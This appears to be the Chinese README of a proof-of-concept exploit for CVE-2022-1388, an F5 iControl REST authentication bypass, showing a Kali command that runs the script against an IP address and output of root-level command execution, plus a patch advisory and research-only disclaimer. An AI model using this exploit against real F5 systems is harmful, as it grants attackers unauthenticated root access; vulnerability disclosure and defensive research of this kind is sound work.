CVE-2022-1388 的 POC,影响多个 F5 产品。
关于该漏洞的技术根本原因分析可以在我们的博客中找到: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
利用此漏洞的请求的必要条件:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
更新到最新版本,或按照 F5 安全公告中的说明进行缓解
本软件仅为学术研究和开发有效防御技术而创建,除非明确授权,否则不得用于攻击系统。项目维护者对软件的滥用不承担任何责任。请负责任地使用。